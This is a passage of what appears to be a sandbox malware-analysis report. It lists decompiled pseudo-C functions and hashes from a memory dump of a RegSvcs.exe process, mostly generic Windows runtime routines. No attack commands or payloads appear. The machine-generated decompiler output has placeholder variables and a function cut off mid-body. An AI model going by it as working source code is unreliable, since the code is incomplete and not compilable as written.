0x018f36d4
0x018f36e5
0x018f36e5

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: cc029a6f11f199030fed9602aaa094173b2ee01fcaa621338eaf8bab1852a891
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: F4C02B70150440FBEF151F34CD00F147294F700B21F6403587320C54F0D52C9D00E508

Uniqueness

Uniqueness Score: -1.00%

Function 018D76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x018d76e4
0x00000000
0x018d76f8
0x018d76fd

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: c3992738c3b4ddbe571595811dd6422b8957c11ba1471dcaed061546ddbc305b
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 11C08C701812845AEB2A570CDE24B207B90AB0870CF48019CAA01894A2D768AA02C208

Uniqueness

Uniqueness Score: -1.00%

Function 018E7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x018e7d56
0x018e7d5b
0x018e7d60
0x018e7d5d
0x018e7d5d
0x018e7d5d

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 59468a82c8f013305028adc0ff14b84cd027fb9ee314945cd482b06b0c1fed01
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: DDB09235302981CFCE16DF18C084B1533E8BB45B40B8400D0E400CBA21D22AE9008900

Uniqueness

Uniqueness Score: -1.00%

Function 018F2ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F2ACB() {
				void* _t5;

				return E018DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x018f2adc

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: de559b3f8f146ea517fe5a515fc3fe596f9ebde2a45732f6a8b5be57410dd678
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: C8B01232C10641CFCF02FF44C650B197331FB00750F05449090017B930C228BD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 019099D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e857a346c407e44e185fbb6529ec5efae77266759af147097ef1e294069e30
Instruction ID: 7d1f9736aa7d5c02f8704f75dd9272e67ff10641c4dfa3e875e388df6999c5b0
Opcode Fuzzy Hash: 91e857a346c407e44e185fbb6529ec5efae77266759af147097ef1e294069e30
Instruction Fuzzy Hash: D89002A161111442D1046199450870644C5A7E1241F51C412A2184554CC5698CA16165

Uniqueness

Uniqueness Score: -1.00%

Function 01909950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75419e31f8b13c8d4fe8cc6b4fb1d436dd85e0f576ba40785afa0b2e5246934
Instruction ID: d65d2be6d884267c2edcf6a57ba7d2a297961efc244fd57c208ac061e6ee5e0f
Opcode Fuzzy Hash: b75419e31f8b13c8d4fe8cc6b4fb1d436dd85e0f576ba40785afa0b2e5246934
Instruction Fuzzy Hash: 0E9002A160151803D140659949086074485A7D0342F51C411A2094555ECA698C917175

Uniqueness

Uniqueness Score: -1.00%

Function 019098A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ab9741e12dbd6cccb5c289e8bbf19876286255420349f8cb6df69c827c571e
Instruction ID: 79d401583ad62fdf0603ef8b0ffe83393375b58f20ec480fb86c8d59c31447da
Opcode Fuzzy Hash: 31ab9741e12dbd6cccb5c289e8bbf19876286255420349f8cb6df69c827c571e
Instruction Fuzzy Hash: 8F90026170111802D102619945186064489E7D1385F91C412E1454555DC6658993B172

Uniqueness

Uniqueness Score: -1.00%

Function 01909820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a17ed593e993e2480f4e5c2dbddad8da4bcaba9f857765f169a191316e1236e
Instruction ID: 67e41a1bbf4946874c24c5e9a4c2b5458230c7ca2fa4d7973c6ae2e44808381e
Opcode Fuzzy Hash: 5a17ed593e993e2480f4e5c2dbddad8da4bcaba9f857765f169a191316e1236e
Instruction Fuzzy Hash: 4690027164111802D141719945086064489B7D0281F91C412A0454554EC6958A96BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0190B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb89850da67fe426994d71bdd63378e71ad1b0dfd3c8549e372f2a88b119520
Instruction ID: bdb114bb67ca1a45f0c8eb51cad182a8f43873150a6e7f19f65b6982dc18f80c
Opcode Fuzzy Hash: 8bb89850da67fe426994d71bdd63378e71ad1b0dfd3c8549e372f2a88b119520
Instruction Fuzzy Hash: 269002A1A01254434540B19949084069495B7E1341391C521A0484560CC6A88895A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 0190A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1d7b5a9cc3d72e3ea78c587abf03208d63033cca804a6a37f743603df42322
Instruction ID: 6987e944e29122293ef8304fa39a3aa893f45a7103735ca24ee420c22e57bfd2
Opcode Fuzzy Hash: 3e1d7b5a9cc3d72e3ea78c587abf03208d63033cca804a6a37f743603df42322
Instruction Fuzzy Hash: 9B90027160155402D1407199854860B9485B7E0341F51C811E0455554CC6558896A261

Uniqueness

Uniqueness Score: -1.00%

Function 01909B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3331c54db67c7b19398acd68677e721a4d786890c48176a23f8c4995a91e26f
Instruction ID: e0ec3c8d949e913a28b80e823164760649fa154229ef368b7fed0f8550a12abd
Opcode Fuzzy Hash: f3331c54db67c7b19398acd68677e721a4d786890c48176a23f8c4995a91e26f
Instruction Fuzzy Hash: 8890026164111C02D140719985187074486E7D0641F51C411A0054554DC65689A576F1

Uniqueness

Uniqueness Score: -1.00%

Function 01909A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef33bb372213b165225c88ff74f393b3b213c8ce6b58bb7de3af38697e028a6
Instruction ID: 535213dfc29fe1c47e25f765287399896fd4fed924149b3ab9513570a9886fa5
Opcode Fuzzy Hash: bef33bb372213b165225c88ff74f393b3b213c8ce6b58bb7de3af38697e028a6
Instruction Fuzzy Hash: F090026160155842D14062994908B0F8585A7E1242F91C419A4186554CC95588956761

Uniqueness

Uniqueness Score: -1.00%

Function 01909A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7870dd5c5edd3fdee17d2642da91c8bc648db00f33a3f1833a9211c9f86b1160
Instruction ID: 1aa8a28e5aaba7b4623575ee48baff8e693376789df7b1b2161c66878a6d9f72
Opcode Fuzzy Hash: 7870dd5c5edd3fdee17d2642da91c8bc648db00f33a3f1833a9211c9f86b1160
Instruction Fuzzy Hash: 1690027160151802D1006199490C7474485A7D0342F51C411A5194555EC6A5C8D17571

Uniqueness

Uniqueness Score: -1.00%

Function 019095F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7961d02576dc9dd2ff0e281559f66806f8a0c6e68526086661f15e71571ed496
Instruction ID: 03b3bda18a4616634416b8cb2e2c374534b490ab2592ad8d90cd3245f6fe8131
Opcode Fuzzy Hash: 7961d02576dc9dd2ff0e281559f66806f8a0c6e68526086661f15e71571ed496
Instruction Fuzzy Hash: 7890027160111C02D104619949086864485A7D0341F51C411A6054655ED6A588D17171

Uniqueness

Uniqueness Score: -1.00%

Function 0190AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189902065483c0dc2dd7a7855a94493f0b87ddaa2759f56c3c74f12734409b35
Instruction ID: 27a88f973454fe7b5354c7ef8da979717647edf980b6510d6e6e20b86155e547
Opcode Fuzzy Hash: 189902065483c0dc2dd7a7855a94493f0b87ddaa2759f56c3c74f12734409b35
Instruction Fuzzy Hash: 1A900271E05114129140719949186468486B7E0781B55C411A0544554CC9948A9563E1

Uniqueness

Uniqueness Score: -1.00%

Function 01909520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febe0f8a0cd13cf19fe7fd7b10588df0db029011035febd81aaea40cf9d909c6
Instruction ID: 7353d5e1dcc33d57c0ba969bb6883541afae621a5e7b4fab116ee2e84d10079f
Opcode Fuzzy Hash: febe0f8a0cd13cf19fe7fd7b10588df0db029011035febd81aaea40cf9d909c6
Instruction Fuzzy Hash: FE9002E1601254924500A2998508B0A8985A7E0241B51C416E1084560CC5658891A175

Uniqueness

Uniqueness Score: -1.00%

Function 01909560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68bd766cc2e27bba8b5e989ec2724352dc1622ccf05ef5b5da0adac6d2b8e95
Instruction ID: 1beabdb9ccec17a2912aa974f2db2256af30b49caf5ec4a9dcaaaa9373403478
Opcode Fuzzy Hash: b68bd766cc2e27bba8b5e989ec2724352dc1622ccf05ef5b5da0adac6d2b8e95
Instruction Fuzzy Hash: 21900265621114020145A599070850B48C5B7D6391391C415F1446590CC66188A56361

Uniqueness

Uniqueness Score: -1.00%

Function 0190A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c1068ac6819cf29035bc93aa6a45a4dd6d76d3590180ada6176d13a458b24b
Instruction ID: febdd9464f37b92bb4920c822c85670f978d61370f0339273bba025f17b03bf4
Opcode Fuzzy Hash: 49c1068ac6819cf29035bc93aa6a45a4dd6d76d3590180ada6176d13a458b24b
Instruction Fuzzy Hash: C1900271701114529500A6D95908A4A8585A7F0341B51D415A4044554CC59488A16161

Uniqueness

Uniqueness Score: -1.00%

Function 01909730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb9dfdbf8ce8417c2a7186516b273349de0580a437a90e197e31b15dfcd34e9
Instruction ID: 1d1d5bebffee472a916b9c413e5365d4d40d212ddfde9ec343a201eab752233a
Opcode Fuzzy Hash: bcb9dfdbf8ce8417c2a7186516b273349de0580a437a90e197e31b15dfcd34e9
Instruction Fuzzy Hash: 79900261A0511802D1407199551C7064495A7D0241F51D411A0054554DC6998A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 0190A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5587b1c8f95e2338a4ca472f23c583227324ecdc82a43181c112c0e6bb823ba4
Instruction ID: a86ba050cdd76c0d7c24a1c1ee7584eed8df26ff772ccd7dc93e8278e7d8447d
Opcode Fuzzy Hash: 5587b1c8f95e2338a4ca472f23c583227324ecdc82a43181c112c0e6bb823ba4
Instruction Fuzzy Hash: 3390027560515842D50065995908A874485A7D0345F51D811A045459CDC69488A1B161

Uniqueness

Uniqueness Score: -1.00%

Function 01909770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2cf83a52fb48abfbbc49b33c8b22ae54f9e6f4f985186404661b0e2fddf416
Instruction ID: d3077ae3b4a06fe6b3660e50c1ee459690da2cc909c3ec7669afef25282d8835
Opcode Fuzzy Hash: 8e2cf83a52fb48abfbbc49b33c8b22ae54f9e6f4f985186404661b0e2fddf416
Instruction Fuzzy Hash: 3290026160515842D1006599550CA064485A7D0245F51D411A1094595DC6758891B171

Uniqueness

Uniqueness Score: -1.00%

Function 01909760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6677206bd096b82c86d68740f029bcf5290d80b6a5c716c5b459926763d7c815
Instruction ID: f96355b554c72573b36537c6855bd5fb8d559f98216f6bf951b01a6d21448639
Opcode Fuzzy Hash: 6677206bd096b82c86d68740f029bcf5290d80b6a5c716c5b459926763d7c815
Instruction Fuzzy Hash: 6390027160111803D1006199560C7074485A7D0241F51D811A0454558DD69688917161

Uniqueness

Uniqueness Score: -1.00%

Function 019096D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f236ab11f2b008c9e28223becf80694674e5258644cf0adecfc637b77b66442
Instruction ID: 84997abe615fb22bad20bf888a8494f463627e4d52c5b448f80e69965326b828
Opcode Fuzzy Hash: 3f236ab11f2b008c9e28223becf80694674e5258644cf0adecfc637b77b66442
Instruction Fuzzy Hash: DF90027160111C42D10061994508B464485A7E0341F51C416A0154654DC655C8917561

Uniqueness

Uniqueness Score: -1.00%

Function 01909610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c292923b0d60ce0b3d742a6aa2f2a083ac773029b28a13aebc271ce83dde569
Instruction ID: 13ecb35d89b984ac078ecd8f7eb1262c54e92efc85c54d8c822c270cf0592f80
Opcode Fuzzy Hash: 6c292923b0d60ce0b3d742a6aa2f2a083ac773029b28a13aebc271ce83dde569
Instruction Fuzzy Hash: 02900271A0511C02D150719945187464485A7D0341F51C411A0054654DC7958A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01909650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f84ccd8247216f1e6b1fead5250b1834a7572a96a82ff42f833192aa4dfe72
Instruction ID: 0b52b714f6cab0dd96b7c43180b5b8c33483f3e91800187e9e7b071d4de47dcb
Opcode Fuzzy Hash: f9f84ccd8247216f1e6b1fead5250b1834a7572a96a82ff42f833192aa4dfe72
Instruction Fuzzy Hash: 1B90027160515C42D14071994508A464495A7D0345F51C411A0094694DD6658D95B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01909670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 3aa9f26176de5b64145ebefa3c955fbc23bbca68377d7ed7a3b4eceb51943b76
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 018F645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E018F645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x19bd360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0190FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E018E2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E018DFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
